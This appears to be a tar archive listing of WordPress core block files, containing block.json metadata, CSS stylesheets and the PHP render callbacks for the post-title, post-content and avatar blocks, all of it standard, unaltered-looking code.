comment-author-name/style-rtl.css000064400000000071151330427370013100 0ustar00.wp-block-comment-author-name{
  box-sizing:border-box;
}comment-author-name/block.json000060400000002250151330427370012411 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comment-author-name",
	"title": "Comment Author Name",
	"category": "theme",
	"ancestor": [ "core/comment-template" ],
	"description": "Displays the name of the author of the comment.",
	"textdomain": "default",
	"attributes": {
		"isLink": {
			"type": "boolean",
			"default": true
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		},
		"textAlign": {
			"type": "string"
		}
	},
	"usesContext": [ "commentId" ],
	"supports": {
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
comment-author-name/style.min.css000064400000000064151330427370013065 0ustar00.wp-block-comment-author-name{box-sizing:border-box}comment-author-name/style-rtl.min.css000064400000000064151330427370013664 0ustar00.wp-block-comment-author-name{box-sizing:border-box}comment-author-name/style.css000064400000000071151330427370012301 0ustar00.wp-block-comment-author-name{
  box-sizing:border-box;
}page-list-item/block.json000060400000002125151330427370011353 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/page-list-item",
	"title": "Page List Item",
	"category": "widgets",
	"parent": [ "core/page-list" ],
	"description": "Displays a page inside a list of all pages.",
	"keywords": [ "page", "menu", "navigation" ],
	"textdomain": "default",
	"attributes": {
		"id": {
			"type": "number"
		},
		"label": {
			"type": "string"
		},
		"title": {
			"type": "string"
		},
		"link": {
			"type": "string"
		},
		"hasChildren": {
			"type": "boolean"
		}
	},
	"usesContext": [
		"textColor",
		"customTextColor",
		"backgroundColor",
		"customBackgroundColor",
		"overlayTextColor",
		"customOverlayTextColor",
		"overlayBackgroundColor",
		"customOverlayBackgroundColor",
		"fontSize",
		"customFontSize",
		"showSubmenuIcon",
		"style",
		"openSubmenusOnClick"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"lock": false,
		"inserter": false,
		"__experimentalToolbar": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-page-list-editor",
	"style": "wp-block-page-list"
}
comment-reply-link/style-rtl.css000064400000000070151330427370012745 0ustar00.wp-block-comment-reply-link{
  box-sizing:border-box;
}comment-reply-link/style.min.css000064400000000063151330427370012732 0ustar00.wp-block-comment-reply-link{box-sizing:border-box}comment-reply-link/style-rtl.min.css000064400000000063151330427370013531 0ustar00.wp-block-comment-reply-link{box-sizing:border-box}comment-reply-link/style.css000064400000000070151330427370012146 0ustar00.wp-block-comment-reply-link{
  box-sizing:border-box;
}comment-reply-link/block.json000060400000001751151330427370012264 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comment-reply-link",
	"title": "Comment Reply Link",
	"category": "theme",
	"ancestor": [ "core/comment-template" ],
	"description": "Displays a link to reply to a comment.",
	"textdomain": "default",
	"usesContext": [ "commentId" ],
	"attributes": {
		"textAlign": {
			"type": "string"
		}
	},
	"supports": {
		"color": {
			"gradients": true,
			"link": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"html": false
	}
}
post-comments-form/block.json000060400000002001151330427370012274 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-comments-form",
	"title": "Comments Form",
	"category": "theme",
	"description": "Display a post's comments form.",
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		}
	},
	"usesContext": [ "postId", "postType" ],
	"supports": {
		"html": false,
		"color": {
			"gradients": true,
			"heading": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextTransform": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		}
	},
	"editorStyle": "wp-block-post-comments-form-editor",
	"style": [
		"wp-block-post-comments-form",
		"wp-block-buttons",
		"wp-block-button"
	]
}
post-comments-form/editor.min.css000060400000000174151330427370013102 0ustar00.wp-block-post-comments-form *{pointer-events:none}.wp-block-post-comments-form .block-editor-warning *{pointer-events:auto}post-comments-form/style-rtl.css000060400000004102151330427370012764 0ustar00:where(.wp-block-post-comments-form) input:not([type=submit]),:where(.wp-block-post-comments-form) textarea{
  border:1px solid #949494;
  font-family:inherit;
  font-size:1em;
}
:where(.wp-block-post-comments-form) input:where(:not([type=submit]):not([type=checkbox])),:where(.wp-block-post-comments-form) textarea{
  padding:calc(.667em + 2px);
}

.wp-block-post-comments-form{
  box-sizing:border-box;
}
.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){
  font-weight:inherit;
}
.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){
  font-family:inherit;
}
.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){
  font-size:inherit;
}
.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){
  line-height:inherit;
}
.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){
  font-style:inherit;
}
.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){
  letter-spacing:inherit;
}
.wp-block-post-comments-form input[type=submit]{
  box-shadow:none;
  cursor:pointer;
  display:inline-block;
  overflow-wrap:break-word;
  text-align:center;
}
.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{
  box-sizing:border-box;
  display:block;
  width:100%;
}
.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{
  display:block;
  margin-bottom:.25em;
}
.wp-block-post-comments-form .comment-form-cookies-consent{
  display:flex;
  gap:.25em;
}
.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{
  margin-top:.35em;
}
.wp-block-post-comments-form .comment-reply-title{
  margin-bottom:0;
}
.wp-block-post-comments-form .comment-reply-title :where(small){
  font-size:var(--wp--preset--font-size--medium, smaller);
  margin-right:.5em;
}post-comments-form/editor.css000060400000000207151330427370012315 0ustar00.wp-block-post-comments-form *{
  pointer-events:none;
}
.wp-block-post-comments-form .block-editor-warning *{
  pointer-events:auto;
}post-comments-form/editor-rtl.css000060400000000207151330427370013114 0ustar00.wp-block-post-comments-form *{
  pointer-events:none;
}
.wp-block-post-comments-form .block-editor-warning *{
  pointer-events:auto;
}post-comments-form/editor-rtl.min.css000060400000000174151330427370013701 0ustar00.wp-block-post-comments-form *{pointer-events:none}.wp-block-post-comments-form .block-editor-warning *{pointer-events:auto}post-comments-form/style.min.css000060400000003677151330427370012767 0ustar00:where(.wp-block-post-comments-form) input:not([type=submit]),:where(.wp-block-post-comments-form) textarea{border:1px solid #949494;font-family:inherit;font-size:1em}:where(.wp-block-post-comments-form) input:where(:not([type=submit]):not([type=checkbox])),:where(.wp-block-post-comments-form) textarea{padding:calc(.667em + 2px)}.wp-block-post-comments-form{box-sizing:border-box}.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){font-weight:inherit}.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){font-family:inherit}.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){font-size:inherit}.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){line-height:inherit}.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){font-style:inherit}.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){letter-spacing:inherit}.wp-block-post-comments-form input[type=submit]{box-shadow:none;cursor:pointer;display:inline-block;overflow-wrap:break-word;text-align:center}.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments-form .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments-form .comment-reply-title{margin-bottom:0}.wp-block-post-comments-form .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}post-comments-form/style-rtl.min.css000060400000003700151330427370013551 0ustar00:where(.wp-block-post-comments-form) input:not([type=submit]),:where(.wp-block-post-comments-form) textarea{border:1px solid #949494;font-family:inherit;font-size:1em}:where(.wp-block-post-comments-form) input:where(:not([type=submit]):not([type=checkbox])),:where(.wp-block-post-comments-form) textarea{padding:calc(.667em + 2px)}.wp-block-post-comments-form{box-sizing:border-box}.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){font-weight:inherit}.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){font-family:inherit}.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){font-size:inherit}.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){line-height:inherit}.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){font-style:inherit}.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){letter-spacing:inherit}.wp-block-post-comments-form input[type=submit]{box-shadow:none;cursor:pointer;display:inline-block;overflow-wrap:break-word;text-align:center}.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments-form .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments-form .comment-reply-title{margin-bottom:0}.wp-block-post-comments-form .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-right:.5em}post-comments-form/style.css000060400000004101151330427370012164 0ustar00:where(.wp-block-post-comments-form) input:not([type=submit]),:where(.wp-block-post-comments-form) textarea{
  border:1px solid #949494;
  font-family:inherit;
  font-size:1em;
}
:where(.wp-block-post-comments-form) input:where(:not([type=submit]):not([type=checkbox])),:where(.wp-block-post-comments-form) textarea{
  padding:calc(.667em + 2px);
}

.wp-block-post-comments-form{
  box-sizing:border-box;
}
.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){
  font-weight:inherit;
}
.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){
  font-family:inherit;
}
.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){
  font-size:inherit;
}
.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){
  line-height:inherit;
}
.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){
  font-style:inherit;
}
.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){
  letter-spacing:inherit;
}
.wp-block-post-comments-form input[type=submit]{
  box-shadow:none;
  cursor:pointer;
  display:inline-block;
  overflow-wrap:break-word;
  text-align:center;
}
.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{
  box-sizing:border-box;
  display:block;
  width:100%;
}
.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{
  display:block;
  margin-bottom:.25em;
}
.wp-block-post-comments-form .comment-form-cookies-consent{
  display:flex;
  gap:.25em;
}
.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{
  margin-top:.35em;
}
.wp-block-post-comments-form .comment-reply-title{
  margin-bottom:0;
}
.wp-block-post-comments-form .comment-reply-title :where(small){
  font-size:var(--wp--preset--font-size--medium, smaller);
  margin-left:.5em;
}post-title.php000060400000004132151330427370007362 0ustar00<?php
/**
 * Server-side rendering of the `core/post-title` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-title` block on the server.
 *
 * @since 6.3.0 Omitting the $post argument from the `get_the_title`.
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the filtered post title for the current post wrapped inside "h1" tags.
 */
function render_block_core_post_title( $attributes, $content, $block ) {
	if ( ! isset( $block->context['postId'] ) ) {
		return '';
	}

	/**
	 * The `$post` argument is intentionally omitted so that changes are reflected when previewing a post.
	 * See: https://github.com/WordPress/gutenberg/pull/37622#issuecomment-1000932816.
	 */
	$title = get_the_title();

	if ( ! $title ) {
		return '';
	}

	$tag_name = 'h2';
	if ( isset( $attributes['level'] ) ) {
		$tag_name = 0 === $attributes['level'] ? 'p' : 'h' . (int) $attributes['level'];
	}

	if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) {
		$rel   = ! empty( $attributes['rel'] ) ? 'rel="' . esc_attr( $attributes['rel'] ) . '"' : '';
		$title = sprintf( '<a href="%1$s" target="%2$s" %3$s>%4$s</a>', esc_url( get_the_permalink( $block->context['postId'] ) ), esc_attr( $attributes['linkTarget'] ), $rel, $title );
	}

	$classes = array();
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	return sprintf(
		'<%1$s %2$s>%3$s</%1$s>',
		$tag_name,
		$wrapper_attributes,
		$title
	);
}

/**
 * Registers the `core/post-title` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_post_title() {
	register_block_type_from_metadata(
		__DIR__ . '/post-title',
		array(
			'render_callback' => 'render_block_core_post_title',
		)
	);
}
add_action( 'init', 'register_block_core_post_title' );
query-pagination-next/block.json000060400000002017151330427370013002 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/query-pagination-next",
	"title": "Next Page",
	"category": "theme",
	"parent": [ "core/query-pagination" ],
	"description": "Displays the next posts page link.",
	"textdomain": "default",
	"attributes": {
		"label": {
			"type": "string"
		}
	},
	"usesContext": [
		"queryId",
		"query",
		"paginationArrow",
		"showLabel",
		"enhancedPagination"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
query-total/style-rtl.min.css000064400000000054151330427370012271 0ustar00.wp-block-query-total{box-sizing:border-box}query-total/style.css000064400000000061151330427370010706 0ustar00.wp-block-query-total{
  box-sizing:border-box;
}query-total/style.min.css000064400000000054151330427370011472 0ustar00.wp-block-query-total{box-sizing:border-box}query-total/block.json000064400000002466151330427370011034 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/query-total",
	"title": "Query Total",
	"category": "theme",
	"ancestor": [ "core/query" ],
	"description": "Display the total number of results in a query.",
	"textdomain": "default",
	"attributes": {
		"displayType": {
			"type": "string",
			"default": "total-results"
		}
	},
	"usesContext": [ "queryId", "query" ],
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"color": {
			"gradients": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"__experimentalBorder": {
			"radius": true,
			"color": true,
			"width": true,
			"style": true,
			"__experimentalDefaultControls": {
				"radius": true,
				"color": true,
				"width": true,
				"style": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-query-total"
}
query-total/style-rtl.css000064400000000061151330427370011505 0ustar00.wp-block-query-total{
  box-sizing:border-box;
}post-content.php000060400000004154151330427370007717 0ustar00<?php
/**
 * Server-side rendering of the `core/post-content` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-content` block on the server.
 *
 * @since 5.8.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Returns the filtered post content of the current post.
 */
function render_block_core_post_content( $attributes, $content, $block ) {
	static $seen_ids = array();

	if ( ! isset( $block->context['postId'] ) ) {
		return '';
	}

	$post_id = $block->context['postId'];

	if ( isset( $seen_ids[ $post_id ] ) ) {
		// WP_DEBUG_DISPLAY must only be honored when WP_DEBUG. This precedent
		// is set in `wp_debug_mode()`.
		$is_debug = WP_DEBUG && WP_DEBUG_DISPLAY;

		return $is_debug ?
			// translators: Visible only in the front end, this warning takes the place of a faulty block.
			__( '[block rendering halted]' ) :
			'';
	}

	$seen_ids[ $post_id ] = true;

	// When inside the main loop, we want to use queried object
	// so that `the_preview` for the current post can apply.
	// We force this behavior by omitting the third argument (post ID) from the `get_the_content`.
	$content = get_the_content();
	// Check for nextpage to display page links for paginated posts.
	if ( has_block( 'core/nextpage' ) ) {
		$content .= wp_link_pages( array( 'echo' => 0 ) );
	}

	/** This filter is documented in wp-includes/post-template.php */
	$content = apply_filters( 'the_content', str_replace( ']]>', ']]&gt;', $content ) );
	unset( $seen_ids[ $post_id ] );

	if ( empty( $content ) ) {
		return '';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => 'entry-content' ) );

	return (
		'<div ' . $wrapper_attributes . '>' .
			$content .
		'</div>'
	);
}

/**
 * Registers the `core/post-content` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_post_content() {
	register_block_type_from_metadata(
		__DIR__ . '/post-content',
		array(
			'render_callback' => 'render_block_core_post_content',
		)
	);
}
add_action( 'init', 'register_block_core_post_content' );
calendar/style.min.css000060400000001225151330427370010752 0ustar00.wp-block-calendar{text-align:center}.wp-block-calendar td,.wp-block-calendar th{border:1px solid;padding:.25em}.wp-block-calendar th{font-weight:400}.wp-block-calendar caption{background-color:inherit}.wp-block-calendar table{border-collapse:collapse;width:100%}.wp-block-calendar table:where(:not(.has-text-color)){color:#40464d}.wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{border-color:#ddd}.wp-block-calendar table.has-background th{background-color:inherit}.wp-block-calendar table.has-text-color th{color:inherit}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}calendar/style.css000060400000001327151330427370010173 0ustar00.wp-block-calendar{
  text-align:center;
}
.wp-block-calendar td,.wp-block-calendar th{
  border:1px solid;
  padding:.25em;
}
.wp-block-calendar th{
  font-weight:400;
}
.wp-block-calendar caption{
  background-color:inherit;
}
.wp-block-calendar table{
  border-collapse:collapse;
  width:100%;
}
.wp-block-calendar table:where(:not(.has-text-color)){
  color:#40464d;
}
.wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{
  border-color:#ddd;
}
.wp-block-calendar table.has-background th{
  background-color:inherit;
}
.wp-block-calendar table.has-text-color th{
  color:inherit;
}

:where(.wp-block-calendar table:not(.has-background) th){
  background:#ddd;
}calendar/style-rtl.min.css000060400000001225151330427370011551 0ustar00.wp-block-calendar{text-align:center}.wp-block-calendar td,.wp-block-calendar th{border:1px solid;padding:.25em}.wp-block-calendar th{font-weight:400}.wp-block-calendar caption{background-color:inherit}.wp-block-calendar table{border-collapse:collapse;width:100%}.wp-block-calendar table:where(:not(.has-text-color)){color:#40464d}.wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{border-color:#ddd}.wp-block-calendar table.has-background th{background-color:inherit}.wp-block-calendar table.has-text-color th{color:inherit}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}calendar/block.json000060400000002004151330427370010277 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/calendar",
	"title": "Calendar",
	"category": "widgets",
	"description": "A calendar of your site’s posts.",
	"keywords": [ "posts", "archive" ],
	"textdomain": "default",
	"attributes": {
		"month": {
			"type": "integer"
		},
		"year": {
			"type": "integer"
		}
	},
	"supports": {
		"align": true,
		"color": {
			"link": true,
			"__experimentalSkipSerialization": [ "text", "background" ],
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			},
			"__experimentalSelector": "table, th"
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-calendar"
}
calendar/style-rtl.css000060400000001327151330427370010772 0ustar00.wp-block-calendar{
  text-align:center;
}
.wp-block-calendar td,.wp-block-calendar th{
  border:1px solid;
  padding:.25em;
}
.wp-block-calendar th{
  font-weight:400;
}
.wp-block-calendar caption{
  background-color:inherit;
}
.wp-block-calendar table{
  border-collapse:collapse;
  width:100%;
}
.wp-block-calendar table:where(:not(.has-text-color)){
  color:#40464d;
}
.wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{
  border-color:#ddd;
}
.wp-block-calendar table.has-background th{
  background-color:inherit;
}
.wp-block-calendar table.has-text-color th{
  color:inherit;
}

:where(.wp-block-calendar table:not(.has-background) th){
  background:#ddd;
}avatar.php000060400000013374151330427370006544 0ustar00<?php
/**
 * Server-side rendering of the `core/avatar` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/avatar` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Return the avatar.
 */
function render_block_core_avatar( $attributes, $content, $block ) {
	$size               = isset( $attributes['size'] ) ? $attributes['size'] : 96;
	$wrapper_attributes = get_block_wrapper_attributes();
	$border_attributes  = get_block_core_avatar_border_attributes( $attributes );

	// Class gets passed through `esc_attr` via `get_avatar`.
	$image_classes = ! empty( $border_attributes['class'] )
		? "wp-block-avatar__image {$border_attributes['class']}"
		: 'wp-block-avatar__image';

	// Unlike class, `get_avatar` doesn't filter the styles via `esc_attr`.
	// The style engine does pass the border styles through
	// `safecss_filter_attr` however.
	$image_styles = ! empty( $border_attributes['style'] )
		? sprintf( ' style="%s"', esc_attr( $border_attributes['style'] ) )
		: '';

	if ( ! isset( $block->context['commentId'] ) ) {
		if ( isset( $attributes['userId'] ) ) {
			$author_id = $attributes['userId'];
		} elseif ( isset( $block->context['postId'] ) ) {
			$author_id = get_post_field( 'post_author', $block->context['postId'] );
		} else {
			$author_id = get_query_var( 'author' );
		}

		if ( empty( $author_id ) ) {
			return '';
		}

		$author_name = get_the_author_meta( 'display_name', $author_id );
		// translators: %s is the Author name.
		$alt          = sprintf( __( '%s Avatar' ), $author_name );
		$avatar_block = get_avatar(
			$author_id,
			$size,
			'',
			$alt,
			array(
				'extra_attr' => $image_styles,
				'class'      => $image_classes,
			)
		);
		if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) {
			$label = '';
			if ( '_blank' === $attributes['linkTarget'] ) {
				// translators: %s is the Author name.
				$label = 'aria-label="' . esc_attr( sprintf( __( '(%s author archive, opens in a new tab)' ), $author_name ) ) . '"';
			}
			// translators: %1$s: Author archive link. %2$s: Link target. %3$s Aria label. %4$s Avatar image.
			$avatar_block = sprintf( '<a href="%1$s" target="%2$s" %3$s class="wp-block-avatar__link">%4$s</a>', esc_url( get_author_posts_url( $author_id ) ), esc_attr( $attributes['linkTarget'] ), $label, $avatar_block );
		}
		return sprintf( '<div %1s>%2s</div>', $wrapper_attributes, $avatar_block );
	}
	$comment = get_comment( $block->context['commentId'] );
	if ( ! $comment ) {
		return '';
	}
	/* translators: %s is the Comment Author name */
	$alt          = sprintf( __( '%s Avatar' ), $comment->comment_author );
	$avatar_block = get_avatar(
		$comment,
		$size,
		'',
		$alt,
		array(
			'extra_attr' => $image_styles,
			'class'      => $image_classes,
		)
	);
	if ( isset( $attributes['isLink'] ) && $attributes['isLink'] && isset( $comment->comment_author_url ) && '' !== $comment->comment_author_url ) {
		$label = '';
		if ( '_blank' === $attributes['linkTarget'] ) {
			// translators: %s is the Comment Author name.
			$label = 'aria-label="' . esc_attr( sprintf( __( '(%s website link, opens in a new tab)' ), $comment->comment_author ) ) . '"';
		}
		// translators: %1$s: Comment Author website link. %2$s: Link target. %3$s Aria label. %4$s Avatar image.
		$avatar_block = sprintf( '<a href="%1$s" target="%2$s" %3$s class="wp-block-avatar__link">%4$s</a>', esc_url( $comment->comment_author_url ), esc_attr( $attributes['linkTarget'] ), $label, $avatar_block );
	}
	return sprintf( '<div %1s>%2s</div>', $wrapper_attributes, $avatar_block );
}

/**
 * Generates class names and styles to apply the border support styles for
 * the Avatar block.
 *
 * @since 6.3.0
 *
 * @param array $attributes The block attributes.
 * @return array The border-related classnames and styles for the block.
 */
function get_block_core_avatar_border_attributes( $attributes ) {
	$border_styles = array();
	$sides         = array( 'top', 'right', 'bottom', 'left' );

	// Border radius.
	if ( isset( $attributes['style']['border']['radius'] ) ) {
		$border_styles['radius'] = $attributes['style']['border']['radius'];
	}

	// Border style.
	if ( isset( $attributes['style']['border']['style'] ) ) {
		$border_styles['style'] = $attributes['style']['border']['style'];
	}

	// Border width.
	if ( isset( $attributes['style']['border']['width'] ) ) {
		$border_styles['width'] = $attributes['style']['border']['width'];
	}

	// Border color.
	$preset_color           = array_key_exists( 'borderColor', $attributes ) ? "var:preset|color|{$attributes['borderColor']}" : null;
	$custom_color           = $attributes['style']['border']['color'] ?? null;
	$border_styles['color'] = $preset_color ? $preset_color : $custom_color;

	// Individual border styles e.g. top, left etc.
	foreach ( $sides as $side ) {
		$border                 = $attributes['style']['border'][ $side ] ?? null;
		$border_styles[ $side ] = array(
			'color' => isset( $border['color'] ) ? $border['color'] : null,
			'style' => isset( $border['style'] ) ? $border['style'] : null,
			'width' => isset( $border['width'] ) ? $border['width'] : null,
		);
	}

	$styles     = wp_style_engine_get_styles( array( 'border' => $border_styles ) );
	$attributes = array();
	if ( ! empty( $styles['classnames'] ) ) {
		$attributes['class'] = $styles['classnames'];
	}
	if ( ! empty( $styles['css'] ) ) {
		$attributes['style'] = $styles['css'];
	}
	return $attributes;
}

/**
 * Registers the `core/avatar` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_avatar() {
	register_block_type_from_metadata(
		__DIR__ . '/avatar',
		array(
			'render_callback' => 'render_block_core_avatar',
		)
	);
}
add_action( 'init', 'register_block_core_avatar' );
page-list/editor-rtl.min.css000060400000002217151330427370012015 0ustar00.wp-block-navigation .wp-block-page-list,.wp-block-navigation .wp-block-page-list>div{background-color:inherit}.wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{display:contents;flex:1}.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{flex:inherit}.wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{display:block}.wp-block-pages-list__item__link{pointer-events:none}@media (min-width:600px){.wp-block-page-list-modal{max-width:480px}}.wp-block-page-list-modal-buttons{display:flex;gap:12px;justify-content:flex-end}.wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;visibility:visible;width:auto}.wp-block-page-list__loading-indicator-container{padding:8px 12px}page-list/style-rtl.css000060400000000610151330427370011100 0ustar00.wp-block-navigation .wp-block-page-list{
  align-items:var(--navigation-layout-align, initial);
  background-color:inherit;
  display:flex;
  flex-direction:var(--navigation-layout-direction, initial);
  flex-wrap:var(--navigation-layout-wrap, wrap);
  justify-content:var(--navigation-layout-justify, initial);
}
